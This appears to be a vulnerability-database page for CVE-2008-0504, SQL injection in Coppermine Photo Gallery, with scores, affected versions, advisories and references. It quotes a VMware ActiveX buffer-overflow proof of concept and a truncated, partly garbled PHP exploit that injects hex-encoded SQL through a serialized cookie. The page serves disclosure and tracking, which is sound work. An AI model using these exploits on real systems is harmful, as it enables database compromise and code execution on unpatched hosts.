CVE-2008-0504
published 2008-01-31CVE-2008-0504: Multiple SQL injection vulnerabilities in Coppermine Photo Gallery (CPG) before 1.4.15 allow remote authenticated administrators to execute arbitrary SQL…
PriorityP336medium6.5CVSS 2.0
AVNACLAuSCPIPAP
EXPLOIT
EPSS
1.97%
77.9th percentile
Multiple SQL injection vulnerabilities in Coppermine Photo Gallery (CPG) before 1.4.15 allow remote authenticated administrators to execute arbitrary SQL commands via the (1) albumid, (2) startpic, and (3) numpics parameters to util.php; and (4) cid_array parameter to reviewcom.php.
Affected
21 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| coppermine-gallery | coppermine_photo_gallery | <= 1.4.14 | — |
| coppermine-gallery | coppermine_photo_gallery | — | — |
| coppermine-gallery | coppermine_photo_gallery | — | — |
| coppermine-gallery | coppermine_photo_gallery | — | — |
| coppermine-gallery | coppermine_photo_gallery | — | — |
| coppermine-gallery | coppermine_photo_gallery | — | — |
| coppermine-gallery | coppermine_photo_gallery | — | — |
| coppermine-gallery | coppermine_photo_gallery | — | — |
| coppermine-gallery | coppermine_photo_gallery | — | — |
| coppermine-gallery | coppermine_photo_gallery | — | — |
| coppermine-gallery | coppermine_photo_gallery | — | — |
| coppermine-gallery | coppermine_photo_gallery | — | — |
| coppermine-gallery | coppermine_photo_gallery | — | — |
| coppermine-gallery | coppermine_photo_gallery | — | — |
| coppermine-gallery | coppermine_photo_gallery | — | — |
| coppermine-gallery | coppermine_photo_gallery | — | — |
| coppermine-gallery | coppermine_photo_gallery | — | — |
| coppermine-gallery | coppermine_photo_gallery | — | — |
| coppermine-gallery | coppermine_photo_gallery | — | — |
| coppermine-gallery | coppermine_photo_gallery | — | — |
| coppermine-gallery | coppermine_photo_gallery | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-vxmj-g28c-3v84: Coppermine Photo Gallery (CPG) 1
ghsa_unreviewed·2022-05-14·CVSS 6.5
CVE-2008-7186 [MEDIUM] GHSA-vxmj-g28c-3v84: Coppermine Photo Gallery (CPG) 1
Coppermine Photo Gallery (CPG) 1.4.14 does not restrict access to update.php, which allows remote attackers to obtain sensitive information such as the database table prefix via a direct request. NOTE: this might be leveraged for attacks against CVE-2008-0504.
GHSA
GHSA-jxr4-9m47-rq8f: Multiple SQL injection vulnerabilities in Coppermine Photo Gallery (CPG) before 1
ghsa_unreviewed·2022-05-01
CVE-2008-0504 [MEDIUM] CWE-89 GHSA-jxr4-9m47-rq8f: Multiple SQL injection vulnerabilities in Coppermine Photo Gallery (CPG) before 1
Multiple SQL injection vulnerabilities in Coppermine Photo Gallery (CPG) before 1.4.15 allow remote authenticated administrators to execute arbitrary SQL commands via the (1) albumid, (2) startpic, and (3) numpics parameters to util.php; and (4) cid_array parameter to reviewcom.php.
No detection rules found.
Exploit-DB
VMware - COM API ActiveX Remote Buffer Overflow (PoC)
exploitdb·2008-09-01
CVE-2008-3892 VMware - COM API ActiveX Remote Buffer Overflow (PoC)
VMware - COM API ActiveX Remote Buffer Overflow (PoC)
---
VMWare COM API Buffer Overflow
url: http://www.vmware.com/
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.net
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7
Sub tryMe
buff_1 = String (2000, "a")
buff_2 = String (2000, "b")
test.GuestInfo (buff_1) = buff_2
End Sub
Dump:
09:25:39.339 pid=0640 tid=0504 EXCEPTION (first-chance)
Exception C0000005 (ACCESS_VIOLATION reading [00000070])
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=0012BE14: 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61
ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ??
Exploit-DB
Coppermine Photo Gallery 1.4.10 - 'cpg1410_xek.php' SQL Injection
exploitdb·2008-01-21
CVE-2008-0504 Coppermine Photo Gallery 1.4.10 - 'cpg1410_xek.php' SQL Injection
Coppermine Photo Gallery 1.4.10 - 'cpg1410_xek.php' SQL Injection
---
toHex($sql) . ', ' . $this->toHex('bazik') . ' LIMIT 1,1/*';
$b1 = 'bazik';
$a2 = $sql;
$b2 = 'bazik';
$arr = array($a1 => $b1, $a2 => $b2);
return $this->GLOBALS['prefix'] . '_albpw=' . rawurlencode(serialize($arr));
}
function toHex($str) {
for ($i=0; $i GLOBALS['host'], 80, $errno, $errstr, 30);
if(!$fp)
die("[-] Can't connect to " . $this->GLOBALS['host'] . " ...\n\n");
else {
fwrite($fp, $out);
while(!feof($fp))
$str .= fgets($fp, 128);
fclose($fp);
return $str;
}
}
function getCookiePrefix() {
$out = "HEAD " . $this->GLOBALS['path'] . "thumbnails.php?album=" . $this->GLOBALS['albumId'] . " HTTP/1.1\r\n";
$out .= "Host: " . $this->GLOBALS['host'] . "\r\n";
$out .= "Connection: Close\r\n\r\n";
preg_match_all('!Se
No writeups or analysis indexed.
http://coppermine-gallery.net/forum/index.php?topic=50103.0http://secunia.com/advisories/28682http://www.securityfocus.com/archive/1/487351/100/200/threadedhttp://www.securityfocus.com/bid/27509http://www.securitytracker.com/id?1019285http://www.vupen.com/english/advisories/2008/0367http://www.waraxe.us/advisory-66.htmlhttp://coppermine-gallery.net/forum/index.php?topic=50103.0http://secunia.com/advisories/28682http://www.securityfocus.com/archive/1/487351/100/200/threadedhttp://www.securityfocus.com/bid/27509http://www.securitytracker.com/id?1019285http://www.vupen.com/english/advisories/2008/0367http://www.waraxe.us/advisory-66.html
2008-01-31
Published